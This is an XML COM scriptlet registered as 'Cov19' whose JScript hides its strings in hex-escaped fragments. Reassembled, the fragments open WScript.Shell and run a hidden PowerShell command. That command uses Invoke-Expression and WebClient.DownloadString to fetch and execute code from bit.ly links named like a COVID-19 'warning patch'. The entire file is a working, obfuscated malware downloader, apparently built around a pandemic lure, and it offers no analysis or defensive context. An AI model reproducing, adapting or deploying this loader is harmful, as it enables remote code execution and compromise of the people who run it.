<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Cov19"
    classid="{10001118-0000-0000-0000-0000FEEDACDC}" >
	
	<script language="JScript">
		<![CDATA[
			var _cs=["\x70\x73","\x6e\x6c","\x20\x49","\x65\x72","\x27\x29","\x6e\x67\x53","\x2f\x2f\x62",'\x31\x30\x32\x34',"\x28\x4e\x65",'\x68\x65',"\x2e\x6c\x79","\x43\x6c\x69","\x73\x3a","\x67\x50\x61","\x6c\x6c","\x57\x61\x72","\x65\x62","\x65\x63","\x2f\x43",'\x30',"\x6e\x69","\x2e\x44\x6f","\x65\x6e\x74","\x45\x6c\x65\x6d\x65\x6e\x74","\x6f\x76\x31","\x20\x4e\x65","\x29\x2e","\x31\x39","\x77\x6e","\x2d\x57",'\x62\x36\x34',"\x28\x27\x68","\x39\x57\x61","\x69\x65\x6e","\x6f\x61\x64","\x74\x74\x70","\x74\x65","\x70\x6f\x77","\x6f\x6b\x65","\x43\x6c","\x45\x58\x28","\x74\x20\x4e","\x68\x74\x74","\x57\x65\x62","\x3a\x2f\x2f","\x74\x72",'\x57\x53',"\x77\x2d",'\x63\x72\x69',"\x6d\x27\x29","\x69\x74","\x53\x74","\x74\x2e\x57","\x69\x6e\x67","\x45\x58","\x6e\x76","\x6e\x67","\x61\x64\x53","\x65\x63\x74","\x72\x69","\x72\x6e","\x28\x27","\x62\x69\x74","\x45\x6c\x65\x6d\x65\x6e\x74","\x74\x29","\x6c\x6f","\x74\x63","\x4e\x65","\x73\x68\x65","\x65\x74\x2e",'\x70\x74',"\x4f\x62\x6a","\x68\x3b\x49","\x6f\x76","\x3b\x49","\x79\x73","\x44\x6f\x77",'\x6c\x6c',"\x74\x63\x68",'\x2e\x53',"\x44\x50\x61","\x69\x6e"]; var _g0 = new ActiveXObject(_cs[46]+_cs[48]+_cs[70]+_cs[79]+_cs[9]+_cs[77]); var _g1 = _g0.Run(_cs[37]+_cs[3]+_cs[68]+_cs[14]+_cs[2]+_cs[54]+_cs[8]+_cs[47]+_cs[71]+_cs[17]+_cs[41]+_cs[69]+_cs[43]+_cs[11]+_cs[22]+_cs[26]+_cs[76]+_cs[1]+_cs[34]+_cs[51]+_cs[59]+_cs[56]+_cs[61]+_cs[42]+_cs[0]+_cs[44]+_cs[62]+_cs[10]+_cs[18]+_cs[24]+_cs[32]+_cs[60]+_cs[81]+_cs[13]+_cs[78]+_cs[4]+_cs[74]+_cs[55]+_cs[38]+_cs[29]+_cs[80]+_cs[66]+_cs[72]+_cs[40]+_cs[67]+_cs[47]+_cs[71]+_cs[58]+_cs[25]+_cs[52]+_cs[16]+_cs[39]+_cs[33]+_cs[64]+_cs[21]+_cs[28]+_cs[65]+_cs[57]+_cs[45]+_cs[53]+_cs[31]+_cs[35]+_cs[12]+_cs[6]+_cs[50]+_cs[10]+_cs[18]+_cs[73]+_cs[27]+_cs[15]+_cs[20]+_cs[5]+_cs[75]+_cs[36]+_cs[49]+";", 0, true)
		]]>
	</script>
		
</registration>
</scriptlet>
